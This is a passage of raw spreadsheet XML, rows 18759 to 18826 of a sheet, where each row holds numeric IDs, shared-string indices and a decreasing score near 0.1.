        <v>2.5078535E7</v>
      </c>
      <c r="C18759" s="2" t="s">
        <v>18076</v>
      </c>
      <c r="D18759" s="2">
        <v>1.0</v>
      </c>
      <c r="E18759" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18759" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18760" ht="15.75" customHeight="1">
      <c r="A18760" s="1">
        <v>30706.0</v>
      </c>
      <c r="B18760" s="2">
        <v>4273627.0</v>
      </c>
      <c r="C18760" s="2" t="s">
        <v>18077</v>
      </c>
      <c r="D18760" s="2">
        <v>1.0</v>
      </c>
      <c r="E18760" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18760" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18761" ht="15.75" customHeight="1">
      <c r="A18761" s="1">
        <v>33720.0</v>
      </c>
      <c r="B18761" s="2">
        <v>8512122.0</v>
      </c>
      <c r="C18761" s="2" t="s">
        <v>18078</v>
      </c>
      <c r="D18761" s="2">
        <v>1.0</v>
      </c>
      <c r="E18761" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18761" s="2">
        <v>0.1010928961748634</v>
      </c>
    </row>
    <row r="18762" ht="15.75" customHeight="1">
      <c r="A18762" s="1">
        <v>22958.0</v>
      </c>
      <c r="B18762" s="2">
        <v>4903934.0</v>
      </c>
      <c r="C18762" s="2" t="s">
        <v>18079</v>
      </c>
      <c r="D18762" s="2">
        <v>1.0</v>
      </c>
      <c r="E18762" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18762" s="2">
        <v>0.1003898635477583</v>
      </c>
    </row>
    <row r="18763" ht="15.75" customHeight="1">
      <c r="A18763" s="1">
        <v>9516.0</v>
      </c>
      <c r="B18763" s="2">
        <v>5.597124E7</v>
      </c>
      <c r="C18763" s="2" t="s">
        <v>18080</v>
      </c>
      <c r="D18763" s="2">
        <v>1.0</v>
      </c>
      <c r="E18763" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18763" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="18764" ht="15.75" customHeight="1">
      <c r="A18764" s="1">
        <v>9764.0</v>
      </c>
      <c r="B18764" s="2">
        <v>5.6499034E7</v>
      </c>
      <c r="C18764" s="2" t="s">
        <v>18081</v>
      </c>
      <c r="D18764" s="2">
        <v>1.0</v>
      </c>
      <c r="E18764" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18764" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="18765" ht="15.75" customHeight="1">
      <c r="A18765" s="1">
        <v>25944.0</v>
      </c>
      <c r="B18765" s="2">
        <v>1.5230907E7</v>
      </c>
      <c r="C18765" s="2" t="s">
        <v>18082</v>
      </c>
      <c r="D18765" s="2">
        <v>1.0</v>
      </c>
      <c r="E18765" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18765" s="2">
        <v>0.1001984126984127</v>
      </c>
    </row>
    <row r="18766" ht="15.75" customHeight="1">
      <c r="A18766" s="1">
        <v>1300.0</v>
      </c>
      <c r="B18766" s="2">
        <v>2.5657743E7</v>
      </c>
      <c r="C18766" s="2" t="s">
        <v>18083</v>
      </c>
      <c r="D18766" s="2">
        <v>1.0</v>
      </c>
      <c r="E18766" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18766" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="18767" ht="15.75" customHeight="1">
      <c r="A18767" s="1">
        <v>15095.0</v>
      </c>
      <c r="B18767" s="2">
        <v>4.1791629E7</v>
      </c>
      <c r="C18767" s="2" t="s">
        <v>18084</v>
      </c>
      <c r="D18767" s="2">
        <v>1.0</v>
      </c>
      <c r="E18767" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18767" s="2">
        <v>0.1</v>
      </c>
    </row>
    <row r="18768" ht="15.75" customHeight="1">
      <c r="A18768" s="1">
        <v>22649.0</v>
      </c>
      <c r="B18768" s="2">
        <v>4.0958476E7</v>
      </c>
      <c r="C18768" s="2" t="s">
        <v>18085</v>
      </c>
      <c r="D18768" s="2">
        <v>1.0</v>
      </c>
      <c r="E18768" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18768" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="18769" ht="15.75" customHeight="1">
      <c r="A18769" s="1">
        <v>28853.0</v>
      </c>
      <c r="B18769" s="2">
        <v>2.9022813E7</v>
      </c>
      <c r="C18769" s="2" t="s">
        <v>18086</v>
      </c>
      <c r="D18769" s="2">
        <v>1.0</v>
      </c>
      <c r="E18769" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18769" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="18770" ht="15.75" customHeight="1">
      <c r="A18770" s="1">
        <v>31719.0</v>
      </c>
      <c r="B18770" s="2">
        <v>5.2113125E7</v>
      </c>
      <c r="C18770" s="2" t="s">
        <v>17951</v>
      </c>
      <c r="D18770" s="2">
        <v>1.0</v>
      </c>
      <c r="E18770" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18770" s="2">
        <v>0.09999999999999998</v>
      </c>
    </row>
    <row r="18771" ht="15.75" customHeight="1">
      <c r="A18771" s="1">
        <v>2145.0</v>
      </c>
      <c r="B18771" s="2">
        <v>3.1620375E7</v>
      </c>
      <c r="C18771" s="2" t="s">
        <v>18087</v>
      </c>
      <c r="D18771" s="2">
        <v>1.0</v>
      </c>
      <c r="E18771" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18771" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="18772" ht="15.75" customHeight="1">
      <c r="A18772" s="1">
        <v>25714.0</v>
      </c>
      <c r="B18772" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C18772" s="2" t="s">
        <v>18088</v>
      </c>
      <c r="D18772" s="2">
        <v>1.0</v>
      </c>
      <c r="E18772" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18772" s="2">
        <v>0.09979423868312756</v>
      </c>
    </row>
    <row r="18773" ht="15.75" customHeight="1">
      <c r="A18773" s="1">
        <v>5098.0</v>
      </c>
      <c r="B18773" s="2">
        <v>4.4511575E7</v>
      </c>
      <c r="C18773" s="2" t="s">
        <v>18089</v>
      </c>
      <c r="D18773" s="2">
        <v>1.0</v>
      </c>
      <c r="E18773" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18773" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="18774" ht="15.75" customHeight="1">
      <c r="A18774" s="1">
        <v>7284.0</v>
      </c>
      <c r="B18774" s="2">
        <v>5.0792952E7</v>
      </c>
      <c r="C18774" s="2" t="s">
        <v>18090</v>
      </c>
      <c r="D18774" s="2">
        <v>1.0</v>
      </c>
      <c r="E18774" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18774" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="18775" ht="15.75" customHeight="1">
      <c r="A18775" s="1">
        <v>25585.0</v>
      </c>
      <c r="B18775" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C18775" s="2" t="s">
        <v>18091</v>
      </c>
      <c r="D18775" s="2">
        <v>1.0</v>
      </c>
      <c r="E18775" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18775" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="18776" ht="15.75" customHeight="1">
      <c r="A18776" s="1">
        <v>26239.0</v>
      </c>
      <c r="B18776" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C18776" s="2" t="s">
        <v>18092</v>
      </c>
      <c r="D18776" s="2">
        <v>1.0</v>
      </c>
      <c r="E18776" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18776" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="18777" ht="15.75" customHeight="1">
      <c r="A18777" s="1">
        <v>27348.0</v>
      </c>
      <c r="B18777" s="2">
        <v>2.1474312E7</v>
      </c>
      <c r="C18777" s="2" t="s">
        <v>18093</v>
      </c>
      <c r="D18777" s="2">
        <v>1.0</v>
      </c>
      <c r="E18777" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18777" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="18778" ht="15.75" customHeight="1">
      <c r="A18778" s="1">
        <v>31430.0</v>
      </c>
      <c r="B18778" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C18778" s="2" t="s">
        <v>18094</v>
      </c>
      <c r="D18778" s="2">
        <v>1.0</v>
      </c>
      <c r="E18778" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18778" s="2">
        <v>0.09979423868312755</v>
      </c>
    </row>
    <row r="18779" ht="15.75" customHeight="1">
      <c r="A18779" s="1">
        <v>21351.0</v>
      </c>
      <c r="B18779" s="2">
        <v>2.1306948E7</v>
      </c>
      <c r="C18779" s="2" t="s">
        <v>18095</v>
      </c>
      <c r="D18779" s="2">
        <v>1.0</v>
      </c>
      <c r="E18779" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18779" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="18780" ht="15.75" customHeight="1">
      <c r="A18780" s="1">
        <v>23238.0</v>
      </c>
      <c r="B18780" s="2">
        <v>5299203.0</v>
      </c>
      <c r="C18780" s="2" t="s">
        <v>18096</v>
      </c>
      <c r="D18780" s="2">
        <v>1.0</v>
      </c>
      <c r="E18780" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18780" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="18781" ht="15.75" customHeight="1">
      <c r="A18781" s="1">
        <v>28972.0</v>
      </c>
      <c r="B18781" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C18781" s="2" t="s">
        <v>18097</v>
      </c>
      <c r="D18781" s="2">
        <v>1.0</v>
      </c>
      <c r="E18781" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18781" s="2">
        <v>0.09958071278825997</v>
      </c>
    </row>
    <row r="18782" ht="15.75" customHeight="1">
      <c r="A18782" s="1">
        <v>6177.0</v>
      </c>
      <c r="B18782" s="2">
        <v>4.7895736E7</v>
      </c>
      <c r="C18782" s="2" t="s">
        <v>18098</v>
      </c>
      <c r="D18782" s="2">
        <v>1.0</v>
      </c>
      <c r="E18782" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18782" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="18783" ht="15.75" customHeight="1">
      <c r="A18783" s="1">
        <v>10083.0</v>
      </c>
      <c r="B18783" s="2">
        <v>5.7162833E7</v>
      </c>
      <c r="C18783" s="2" t="s">
        <v>18099</v>
      </c>
      <c r="D18783" s="2">
        <v>1.0</v>
      </c>
      <c r="E18783" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18783" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="18784" ht="15.75" customHeight="1">
      <c r="A18784" s="1">
        <v>12104.0</v>
      </c>
      <c r="B18784" s="2">
        <v>2.6790865E7</v>
      </c>
      <c r="C18784" s="2" t="s">
        <v>18100</v>
      </c>
      <c r="D18784" s="2">
        <v>1.0</v>
      </c>
      <c r="E18784" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18784" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="18785" ht="15.75" customHeight="1">
      <c r="A18785" s="1">
        <v>16060.0</v>
      </c>
      <c r="B18785" s="2">
        <v>4.5269242E7</v>
      </c>
      <c r="C18785" s="2" t="s">
        <v>18101</v>
      </c>
      <c r="D18785" s="2">
        <v>1.0</v>
      </c>
      <c r="E18785" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18785" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="18786" ht="15.75" customHeight="1">
      <c r="A18786" s="1">
        <v>34252.0</v>
      </c>
      <c r="B18786" s="2">
        <v>4.9250306E7</v>
      </c>
      <c r="C18786" s="2" t="s">
        <v>18102</v>
      </c>
      <c r="D18786" s="2">
        <v>1.0</v>
      </c>
      <c r="E18786" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18786" s="2">
        <v>0.09958071278825996</v>
      </c>
    </row>
    <row r="18787" ht="15.75" customHeight="1">
      <c r="A18787" s="1">
        <v>16263.0</v>
      </c>
      <c r="B18787" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C18787" s="2" t="s">
        <v>18103</v>
      </c>
      <c r="D18787" s="2">
        <v>1.0</v>
      </c>
      <c r="E18787" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18787" s="2">
        <v>0.09958071278825995</v>
      </c>
    </row>
    <row r="18788" ht="15.75" customHeight="1">
      <c r="A18788" s="1">
        <v>14336.0</v>
      </c>
      <c r="B18788" s="2">
        <v>3.8772824E7</v>
      </c>
      <c r="C18788" s="2" t="s">
        <v>18104</v>
      </c>
      <c r="D18788" s="2">
        <v>1.0</v>
      </c>
      <c r="E18788" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18788" s="2">
        <v>0.09946236559139786</v>
      </c>
    </row>
    <row r="18789" ht="15.75" customHeight="1">
      <c r="A18789" s="1">
        <v>361.0</v>
      </c>
      <c r="B18789" s="2">
        <v>1.6126433E7</v>
      </c>
      <c r="C18789" s="2" t="s">
        <v>18105</v>
      </c>
      <c r="D18789" s="2">
        <v>1.0</v>
      </c>
      <c r="E18789" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18789" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18790" ht="15.75" customHeight="1">
      <c r="A18790" s="1">
        <v>789.0</v>
      </c>
      <c r="B18790" s="2">
        <v>2.1211899E7</v>
      </c>
      <c r="C18790" s="2" t="s">
        <v>18106</v>
      </c>
      <c r="D18790" s="2">
        <v>1.0</v>
      </c>
      <c r="E18790" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18790" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18791" ht="15.75" customHeight="1">
      <c r="A18791" s="1">
        <v>939.0</v>
      </c>
      <c r="B18791" s="2">
        <v>2.2421134E7</v>
      </c>
      <c r="C18791" s="2" t="s">
        <v>18107</v>
      </c>
      <c r="D18791" s="2">
        <v>1.0</v>
      </c>
      <c r="E18791" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18791" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18792" ht="15.75" customHeight="1">
      <c r="A18792" s="1">
        <v>1025.0</v>
      </c>
      <c r="B18792" s="2">
        <v>2.3169827E7</v>
      </c>
      <c r="C18792" s="2" t="s">
        <v>18108</v>
      </c>
      <c r="D18792" s="2">
        <v>1.0</v>
      </c>
      <c r="E18792" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18792" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18793" ht="15.75" customHeight="1">
      <c r="A18793" s="1">
        <v>1050.0</v>
      </c>
      <c r="B18793" s="2">
        <v>2.3415242E7</v>
      </c>
      <c r="C18793" s="2" t="s">
        <v>18109</v>
      </c>
      <c r="D18793" s="2">
        <v>1.0</v>
      </c>
      <c r="E18793" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18793" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18794" ht="15.75" customHeight="1">
      <c r="A18794" s="1">
        <v>1081.0</v>
      </c>
      <c r="B18794" s="2">
        <v>2.3635624E7</v>
      </c>
      <c r="C18794" s="2" t="s">
        <v>18110</v>
      </c>
      <c r="D18794" s="2">
        <v>1.0</v>
      </c>
      <c r="E18794" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18794" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18795" ht="15.75" customHeight="1">
      <c r="A18795" s="1">
        <v>1268.0</v>
      </c>
      <c r="B18795" s="2">
        <v>2.5266486E7</v>
      </c>
      <c r="C18795" s="2" t="s">
        <v>18111</v>
      </c>
      <c r="D18795" s="2">
        <v>1.0</v>
      </c>
      <c r="E18795" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18795" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18796" ht="15.75" customHeight="1">
      <c r="A18796" s="1">
        <v>1413.0</v>
      </c>
      <c r="B18796" s="2">
        <v>2.6482398E7</v>
      </c>
      <c r="C18796" s="2" t="s">
        <v>18112</v>
      </c>
      <c r="D18796" s="2">
        <v>1.0</v>
      </c>
      <c r="E18796" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18796" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18797" ht="15.75" customHeight="1">
      <c r="A18797" s="1">
        <v>1578.0</v>
      </c>
      <c r="B18797" s="2">
        <v>2.7730877E7</v>
      </c>
      <c r="C18797" s="2" t="s">
        <v>18113</v>
      </c>
      <c r="D18797" s="2">
        <v>1.0</v>
      </c>
      <c r="E18797" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18797" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18798" ht="15.75" customHeight="1">
      <c r="A18798" s="1">
        <v>1631.0</v>
      </c>
      <c r="B18798" s="2">
        <v>2.7998059E7</v>
      </c>
      <c r="C18798" s="2" t="s">
        <v>18114</v>
      </c>
      <c r="D18798" s="2">
        <v>1.0</v>
      </c>
      <c r="E18798" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18798" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18799" ht="15.75" customHeight="1">
      <c r="A18799" s="1">
        <v>1708.0</v>
      </c>
      <c r="B18799" s="2">
        <v>2.8572219E7</v>
      </c>
      <c r="C18799" s="2" t="s">
        <v>18115</v>
      </c>
      <c r="D18799" s="2">
        <v>1.0</v>
      </c>
      <c r="E18799" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18799" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18800" ht="15.75" customHeight="1">
      <c r="A18800" s="1">
        <v>2097.0</v>
      </c>
      <c r="B18800" s="2">
        <v>3.130418E7</v>
      </c>
      <c r="C18800" s="2" t="s">
        <v>18116</v>
      </c>
      <c r="D18800" s="2">
        <v>1.0</v>
      </c>
      <c r="E18800" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18800" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18801" ht="15.75" customHeight="1">
      <c r="A18801" s="1">
        <v>2160.0</v>
      </c>
      <c r="B18801" s="2">
        <v>3.1749996E7</v>
      </c>
      <c r="C18801" s="2" t="s">
        <v>18117</v>
      </c>
      <c r="D18801" s="2">
        <v>1.0</v>
      </c>
      <c r="E18801" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18801" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18802" ht="15.75" customHeight="1">
      <c r="A18802" s="1">
        <v>3152.0</v>
      </c>
      <c r="B18802" s="2">
        <v>3.6984668E7</v>
      </c>
      <c r="C18802" s="2" t="s">
        <v>18118</v>
      </c>
      <c r="D18802" s="2">
        <v>1.0</v>
      </c>
      <c r="E18802" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18802" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18803" ht="15.75" customHeight="1">
      <c r="A18803" s="1">
        <v>3288.0</v>
      </c>
      <c r="B18803" s="2">
        <v>3.7504586E7</v>
      </c>
      <c r="C18803" s="2" t="s">
        <v>18119</v>
      </c>
      <c r="D18803" s="2">
        <v>1.0</v>
      </c>
      <c r="E18803" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18803" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18804" ht="15.75" customHeight="1">
      <c r="A18804" s="1">
        <v>3592.0</v>
      </c>
      <c r="B18804" s="2">
        <v>3.9061526E7</v>
      </c>
      <c r="C18804" s="2" t="s">
        <v>18120</v>
      </c>
      <c r="D18804" s="2">
        <v>1.0</v>
      </c>
      <c r="E18804" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18804" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18805" ht="15.75" customHeight="1">
      <c r="A18805" s="1">
        <v>3630.0</v>
      </c>
      <c r="B18805" s="2">
        <v>3.9232634E7</v>
      </c>
      <c r="C18805" s="2" t="s">
        <v>18121</v>
      </c>
      <c r="D18805" s="2">
        <v>1.0</v>
      </c>
      <c r="E18805" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18805" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18806" ht="15.75" customHeight="1">
      <c r="A18806" s="1">
        <v>3968.0</v>
      </c>
      <c r="B18806" s="2">
        <v>4.0747076E7</v>
      </c>
      <c r="C18806" s="2" t="s">
        <v>18122</v>
      </c>
      <c r="D18806" s="2">
        <v>1.0</v>
      </c>
      <c r="E18806" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18806" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18807" ht="15.75" customHeight="1">
      <c r="A18807" s="1">
        <v>4963.0</v>
      </c>
      <c r="B18807" s="2">
        <v>4.4076742E7</v>
      </c>
      <c r="C18807" s="2" t="s">
        <v>18123</v>
      </c>
      <c r="D18807" s="2">
        <v>1.0</v>
      </c>
      <c r="E18807" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18807" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18808" ht="15.75" customHeight="1">
      <c r="A18808" s="1">
        <v>5888.0</v>
      </c>
      <c r="B18808" s="2">
        <v>4709179.0</v>
      </c>
      <c r="C18808" s="2" t="s">
        <v>18124</v>
      </c>
      <c r="D18808" s="2">
        <v>1.0</v>
      </c>
      <c r="E18808" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18808" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18809" ht="15.75" customHeight="1">
      <c r="A18809" s="1">
        <v>6066.0</v>
      </c>
      <c r="B18809" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C18809" s="5" t="s">
        <v>18125</v>
      </c>
      <c r="D18809" s="2">
        <v>1.0</v>
      </c>
      <c r="E18809" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18809" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18810" ht="15.75" customHeight="1">
      <c r="A18810" s="1">
        <v>6633.0</v>
      </c>
      <c r="B18810" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C18810" s="2" t="s">
        <v>18126</v>
      </c>
      <c r="D18810" s="2">
        <v>1.0</v>
      </c>
      <c r="E18810" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18810" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18811" ht="15.75" customHeight="1">
      <c r="A18811" s="1">
        <v>7152.0</v>
      </c>
      <c r="B18811" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C18811" s="2" t="s">
        <v>18127</v>
      </c>
      <c r="D18811" s="2">
        <v>1.0</v>
      </c>
      <c r="E18811" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18811" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18812" ht="15.75" customHeight="1">
      <c r="A18812" s="1">
        <v>7488.0</v>
      </c>
      <c r="B18812" s="2">
        <v>5.1374024E7</v>
      </c>
      <c r="C18812" s="2" t="s">
        <v>18128</v>
      </c>
      <c r="D18812" s="2">
        <v>1.0</v>
      </c>
      <c r="E18812" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18812" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18813" ht="15.75" customHeight="1">
      <c r="A18813" s="1">
        <v>7533.0</v>
      </c>
      <c r="B18813" s="2">
        <v>5.1470923E7</v>
      </c>
      <c r="C18813" s="2" t="s">
        <v>18129</v>
      </c>
      <c r="D18813" s="2">
        <v>1.0</v>
      </c>
      <c r="E18813" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18813" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18814" ht="15.75" customHeight="1">
      <c r="A18814" s="1">
        <v>7722.0</v>
      </c>
      <c r="B18814" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C18814" s="2" t="s">
        <v>18130</v>
      </c>
      <c r="D18814" s="2">
        <v>1.0</v>
      </c>
      <c r="E18814" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18814" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18815" ht="15.75" customHeight="1">
      <c r="A18815" s="1">
        <v>7723.0</v>
      </c>
      <c r="B18815" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C18815" s="2" t="s">
        <v>18131</v>
      </c>
      <c r="D18815" s="2">
        <v>1.0</v>
      </c>
      <c r="E18815" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18815" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18816" ht="15.75" customHeight="1">
      <c r="A18816" s="1">
        <v>7724.0</v>
      </c>
      <c r="B18816" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C18816" s="2" t="s">
        <v>18132</v>
      </c>
      <c r="D18816" s="2">
        <v>1.0</v>
      </c>
      <c r="E18816" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18816" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18817" ht="15.75" customHeight="1">
      <c r="A18817" s="1">
        <v>7725.0</v>
      </c>
      <c r="B18817" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C18817" s="2" t="s">
        <v>18133</v>
      </c>
      <c r="D18817" s="2">
        <v>1.0</v>
      </c>
      <c r="E18817" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18817" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18818" ht="15.75" customHeight="1">
      <c r="A18818" s="1">
        <v>8331.0</v>
      </c>
      <c r="B18818" s="2">
        <v>5.3675028E7</v>
      </c>
      <c r="C18818" s="2" t="s">
        <v>18134</v>
      </c>
      <c r="D18818" s="2">
        <v>1.0</v>
      </c>
      <c r="E18818" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18818" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18819" ht="15.75" customHeight="1">
      <c r="A18819" s="1">
        <v>8427.0</v>
      </c>
      <c r="B18819" s="2">
        <v>5.3935152E7</v>
      </c>
      <c r="C18819" s="2" t="s">
        <v>18135</v>
      </c>
      <c r="D18819" s="2">
        <v>1.0</v>
      </c>
      <c r="E18819" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18819" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18820" ht="15.75" customHeight="1">
      <c r="A18820" s="1">
        <v>8501.0</v>
      </c>
      <c r="B18820" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C18820" s="2" t="s">
        <v>18136</v>
      </c>
      <c r="D18820" s="2">
        <v>1.0</v>
      </c>
      <c r="E18820" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18820" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18821" ht="15.75" customHeight="1">
      <c r="A18821" s="1">
        <v>8561.0</v>
      </c>
      <c r="B18821" s="2">
        <v>5.4174058E7</v>
      </c>
      <c r="C18821" s="2" t="s">
        <v>18137</v>
      </c>
      <c r="D18821" s="2">
        <v>1.0</v>
      </c>
      <c r="E18821" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18821" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18822" ht="15.75" customHeight="1">
      <c r="A18822" s="1">
        <v>8709.0</v>
      </c>
      <c r="B18822" s="2">
        <v>5.4451996E7</v>
      </c>
      <c r="C18822" s="2" t="s">
        <v>18138</v>
      </c>
      <c r="D18822" s="2">
        <v>1.0</v>
      </c>
      <c r="E18822" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18822" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18823" ht="15.75" customHeight="1">
      <c r="A18823" s="1">
        <v>8905.0</v>
      </c>
      <c r="B18823" s="2">
        <v>5.4795425E7</v>
      </c>
      <c r="C18823" s="2" t="s">
        <v>18139</v>
      </c>
      <c r="D18823" s="2">
        <v>1.0</v>
      </c>
      <c r="E18823" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18823" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18824" ht="15.75" customHeight="1">
      <c r="A18824" s="1">
        <v>9403.0</v>
      </c>
      <c r="B18824" s="2">
        <v>5.576675E7</v>
      </c>
      <c r="C18824" s="2" t="s">
        <v>18140</v>
      </c>
      <c r="D18824" s="2">
        <v>1.0</v>
      </c>
      <c r="E18824" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18824" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18825" ht="15.75" customHeight="1">
      <c r="A18825" s="1">
        <v>9529.0</v>
      </c>
      <c r="B18825" s="2">
        <v>5.5981292E7</v>
      </c>
      <c r="C18825" s="2" t="s">
        <v>18141</v>
      </c>
      <c r="D18825" s="2">
        <v>1.0</v>
      </c>
      <c r="E18825" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18825" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="18826" ht="15.75" customHeight="1">
      <c r="A18826" s="1">
        <v>9679.0</v>
      </c>
      <c r="B18826" s="2">
        <v>5.6325358E7</v>
